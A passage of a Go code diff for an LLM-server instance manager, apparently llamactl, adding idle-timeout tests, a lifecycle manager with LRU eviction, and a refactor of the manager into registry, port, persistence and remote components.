backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

152
pkg/manager/lifecycle.go Normal file
View File

@@ -0,0 +1,152 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
"sync"
"time"
)
// lifecycleManager handles background timeout checking and LRU eviction.
// It properly coordinates shutdown to prevent races with the timeout checker.
type lifecycleManager struct {
registry *instanceRegistry
manager InstanceManager // For calling Stop/Evict operations
ticker *time.Ticker
checkInterval time.Duration
enableLRU bool
shutdownChan chan struct{}
shutdownDone chan struct{}
shutdownOnce sync.Once
}
// newLifecycleManager creates a new lifecycle manager.
func newLifecycleManager(
registry *instanceRegistry,
manager InstanceManager,
checkInterval time.Duration,
enableLRU bool,
) *lifecycleManager {
if checkInterval <= 0 {
checkInterval = 5 * time.Minute // Default to 5 minutes
}
return &lifecycleManager{
registry: registry,
manager: manager,
ticker: time.NewTicker(checkInterval),
checkInterval: checkInterval,
enableLRU: enableLRU,
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
}
// Start begins the timeout checking loop in a goroutine.
func (l *lifecycleManager) start() {
go l.timeoutCheckLoop()
}
// Stop gracefully stops the lifecycle manager.
// This ensures the timeout checker completes before instance cleanup begins.
func (l *lifecycleManager) stop() {
l.shutdownOnce.Do(func() {
close(l.shutdownChan)
<-l.shutdownDone // Wait for checker to finish (prevents shutdown race)
l.ticker.Stop()
})
}
// timeoutCheckLoop is the main loop that periodically checks for timeouts.
func (l *lifecycleManager) timeoutCheckLoop() {
defer close(l.shutdownDone) // Signal completion
for {
select {
case <-l.ticker.C:
l.checkTimeouts()
case <-l.shutdownChan:
return // Exit goroutine on shutdown
}
}
}
// checkTimeouts checks all instances for timeout and stops those that have timed out.
func (l *lifecycleManager) checkTimeouts() {
// Get all instances from registry
instances := l.registry.list()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range instances {
// Skip remote instances - they are managed by their respective nodes
if inst.IsRemote() {
continue
}
// Only check running instances
if !l.registry.isRunning(inst.Name) {
continue
}
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := l.manager.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRU finds and stops the least recently used running instance.
// This is called when max running instances limit is reached.
func (l *lifecycleManager) evictLRU() error {
if !l.enableLRU {
return fmt.Errorf("LRU eviction is not enabled")
}
// Get all running instances
runningInstances := l.registry.listRunning()
var lruInstance *instance.Instance
for _, inst := range runningInstances {
// Skip remote instances - they are managed by their respective nodes
if inst.IsRemote() {
continue
}
// Skip instances without idle timeout
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict the LRU instance
log.Printf("Evicting LRU instance %s", lruInstance.Name)
_, err := l.manager.StopInstance(lruInstance.Name)
return err
}

View File

@@ -0,0 +1,220 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestInstanceTimeoutLogic(t *testing.T) {
testManager := createTestManager(t)
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
inst := createInstanceWithTimeout(t, testManager, "timeout-test", "/path/to/model.gguf", &idleTimeout)
// Test timeout logic with mock time provider
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
defer inst.SetStatus(instance.Stopped)
// Update last request time
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
}
func TestInstanceWithoutTimeoutNeverExpires(t *testing.T) {
testManager := createTestManager(t)
defer testManager.Shutdown()
noTimeoutInst := createInstanceWithTimeout(t, testManager, "no-timeout-test", "/path/to/model.gguf", nil)
mockTime := NewMockTimeProvider(time.Now())
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running)
defer noTimeoutInst.SetStatus(instance.Stopped)
noTimeoutInst.UpdateLastRequestTime()
// Advance time significantly
mockTime.SetTime(mockTime.Now().Add(24 * time.Hour))
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager(t)
defer manager.Shutdown()
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
validTimeout := 1
inst1 := createInstanceWithTimeout(t, manager, "instance-1", "/path/to/model1.gguf", &validTimeout)
inst2 := createInstanceWithTimeout(t, manager, "instance-2", "/path/to/model2.gguf", &validTimeout)
inst3 := createInstanceWithTimeout(t, manager, "instance-3", "/path/to/model3.gguf", &validTimeout)
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
defer func() {
// Clean up - ensure all instances are stopped
for _, inst := range []*instance.Instance{inst1, inst2, inst3} {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
if err := manager.EvictLRUInstance(); err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
}
func TestEvictLRUInstance_NoRunningInstances(t *testing.T) {
manager := createTestManager(t)
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
}
func TestEvictLRUInstance_OnlyEvictsTimeoutEnabledInstances(t *testing.T) {
manager := createTestManager(t)
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
// Only timeout-enabled instances should be eligible for eviction
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(t, manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(t, manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(t, manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Instance{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
}
// Helper function to create instances with different timeout configurations
func createInstanceWithTimeout(t *testing.T, manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
t.Helper()
options := &instance.Options{
IdleTimeout: timeout,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: model,
},
},
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,298 +1,297 @@
package manager
import (
"encoding/json"
"context"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
ListInstances() ([]*instance.Instance, error)
CreateInstance(name string, options *instance.Options) (*instance.Instance, error)
GetInstance(name string) (*instance.Instance, error)
UpdateInstance(name string, options *instance.Options) (*instance.Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
StartInstance(name string) (*instance.Instance, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
StopInstance(name string) (*instance.Instance, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
RestartInstance(name string) (*instance.Instance, error)
GetInstanceLogs(name string, numLines int) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
backendsConfig config.BackendConfig
// Components (each with own synchronization)
registry *instanceRegistry
ports *portAllocator
persistence *instancePersister
remote *remoteManager
lifecycle *lifecycleManager
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
// Configuration
globalConfig *config.AppConfig
// Synchronization
instanceLocks sync.Map // map[string]*sync.Mutex - per-instance locks for concurrent operations
shutdownOnce sync.Once
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
backendsConfig: backendsConfig,
// New creates a new instance of InstanceManager.
func New(globalConfig *config.AppConfig) InstanceManager {
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
if globalConfig.Instances.TimeoutCheckInterval <= 0 {
globalConfig.Instances.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
// Initialize components
registry := newInstanceRegistry()
// Initialize port allocator
portRange := globalConfig.Instances.PortRange
ports := newPortAllocator(portRange[0], portRange[1])
// Initialize persistence
persistence := newInstancePersister(globalConfig.Instances.InstancesDir)
// Initialize remote manager
remote := newRemoteManager(globalConfig.Nodes, 30*time.Second)
// Create manager instance
im := &instanceManager{
registry: registry,
ports: ports,
persistence: persistence,
remote: remote,
globalConfig: globalConfig,
}
// Initialize lifecycle manager (needs reference to manager for Stop/Evict operations)
checkInterval := time.Duration(globalConfig.Instances.TimeoutCheckInterval) * time.Minute
im.lifecycle = newLifecycleManager(registry, im, checkInterval, true)
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
// Start the lifecycle manager
im.lifecycle.start()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
// persistInstance saves an instance using the persistence component
func (im *instanceManager) persistInstance(inst *instance.Instance) error {
return im.persistence.save(inst)
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
im.shutdownOnce.Do(func() {
// 1. Stop lifecycle manager (stops timeout checker)
im.lifecycle.stop()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// 2. Get running instances (no lock needed - registry handles it)
running := im.registry.listRunning()
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
// 3. Stop local instances concurrently
var wg sync.WaitGroup
for _, inst := range running {
if inst.IsRemote() {
continue // Skip remote instances
}
}(runningNames[i], inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
wg.Add(1)
go func(inst *instance.Instance) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", inst.Name)
if err := inst.Stop(); err != nil {
log.Printf("Error stopping instance %s: %v\n", inst.Name, err)
}
}(inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
})
}
// loadInstances restores all instances from disk
// loadInstances restores all instances from disk using the persistence component
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
// Load all instances from persistence
instances, err := im.persistence.loadAll()
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
return fmt.Errorf("failed to load instances: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
if len(instances) == 0 {
return nil
}
// Process each loaded instance
for _, persistedInst := range instances {
if err := im.loadInstance(persistedInst); err != nil {
log.Printf("Failed to load instance %s: %v", persistedInst.Name, err)
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
log.Printf("Loaded %d instances from persistence", len(instances))
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
// loadInstance loads a single persisted instance and adds it to the registry
func (im *instanceManager) loadInstance(persistedInst *instance.Instance) error {
name := persistedInst.Name
options := persistedInst.GetOptions()
// Check if this is a remote instance (local node not in the Nodes set)
var isRemote bool
var nodeName string
if options != nil {
if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
// Get the first node from the set
for node := range options.Nodes {
nodeName = node
isRemote = true
break
}
}
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
var statusCallback func(oldStatus, newStatus instance.Status)
if !isRemote {
// Only set status callback for local instances
statusCallback = func(oldStatus, newStatus instance.Status) {
im.onStatusChange(name, oldStatus, newStatus)
}
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
inst := instance.New(name, im.globalConfig, options, statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.SetStatus(persistedInstance.Status)
inst.Created = persistedInst.Created
inst.SetStatus(persistedInst.GetStatus())
// Check for port conflicts and add to maps
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
// Handle remote instance mapping
if isRemote {
// Map instance to node in remote manager
if err := im.remote.setInstanceNode(name, nodeName); err != nil {
return fmt.Errorf("failed to set instance node: %w", err)
}
} else {
// Allocate port for local instances
if inst.GetPort() > 0 {
port := inst.GetPort()
if err := im.ports.allocateSpecific(port, name); err != nil {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use: %w", name, port, err)
}
}
im.ports[port] = true
}
im.instances[name] = inst
// Add instance to registry
if err := im.registry.add(inst); err != nil {
return fmt.Errorf("failed to add instance to registry: %w", err)
}
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
// For instances with auto-restart disabled, it sets their status to Stopped
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
instances := im.registry.list()
var instancesToStart []*instance.Instance
var instancesToStop []*instance.Instance
for _, inst := range instances {
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
inst.GetOptions().AutoRestart != nil {
if *inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
} else {
// Instance was running but auto-restart is disabled, mark as stopped
instancesToStop = append(instancesToStop, inst)
}
}
}
im.mu.RUnlock()
// Stop instances that have auto-restart disabled
for _, inst := range instancesToStop {
log.Printf("Instance %s was running but auto-restart is disabled, setting status to stopped", inst.Name)
inst.SetStatus(instance.Stopped)
im.registry.markStopped(inst.Name)
}
// Start instances that have auto-restart enabled
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
im.registry.markStopped(inst.Name)
// Check if this is a remote instance
if node, exists := im.remote.getNodeForInstance(inst.Name); exists && node != nil {
// Remote instance - use remote manager with context
ctx := context.Background()
if _, err := im.remote.startInstance(ctx, node, inst.Name); err != nil {
log.Printf("Failed to auto-start remote instance %s: %v", inst.Name, err)
}
} else {
// Local instance - call Start() directly
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.Status) {
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
im.registry.markRunning(name)
} else {
delete(im.runningInstances, name)
im.registry.markStopped(name)
}
}
// getNodeForInstance returns the node configuration for a remote instance
// Returns nil if the instance is not remote or the node is not found
func (im *instanceManager) getNodeForInstance(inst *instance.Instance) *config.NodeConfig {
if !inst.IsRemote() {
return nil
}
// Check if we have a node mapping in remote manager
if nodeConfig, exists := im.remote.getNodeForInstance(inst.Name); exists {
return nodeConfig
}
return nil
}
// lockInstance returns the lock for a specific instance, creating one if needed.
// This allows concurrent operations on different instances while preventing
// concurrent operations on the same instance.
func (im *instanceManager) lockInstance(name string) *sync.Mutex {
lock, _ := im.instanceLocks.LoadOrStore(name, &sync.Mutex{})
return lock.(*sync.Mutex)
}
// unlockAndCleanup unlocks the instance lock and removes it from the map.
// This should only be called when deleting an instance to prevent memory leaks.
func (im *instanceManager) unlockAndCleanup(name string) {
if lock, ok := im.instanceLocks.Load(name); ok {
lock.(*sync.Mutex).Unlock()
im.instanceLocks.Delete(name)
}
}

View File

@@ -3,78 +3,28 @@ package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
)
func TestNewInstanceManager(t *testing.T) {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
mgr := manager.NewInstanceManager(backendConfig, cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestPersistence(t *testing.T) {
func TestManager_PersistsAndLoadsInstances(t *testing.T) {
tempDir := t.TempDir()
appConfig := createTestAppConfig(tempDir)
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(backendConfig, cfg)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
// Create instance and check file was created
manager1 := manager.New(appConfig)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
@@ -83,14 +33,13 @@ func TestPersistence(t *testing.T) {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(backendConfig, cfg)
// Load instances from disk
manager2 := manager.New(appConfig)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
@@ -101,15 +50,31 @@ func TestPersistence(t *testing.T) {
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
func TestDeleteInstance_RemovesPersistenceFile(t *testing.T) {
tempDir := t.TempDir()
appConfig := createTestAppConfig(tempDir)
mgr := manager.New(appConfig)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
expectedPath := filepath.Join(tempDir, "test-instance.json")
err = mgr.DeleteInstance("test-instance")
if err != nil {
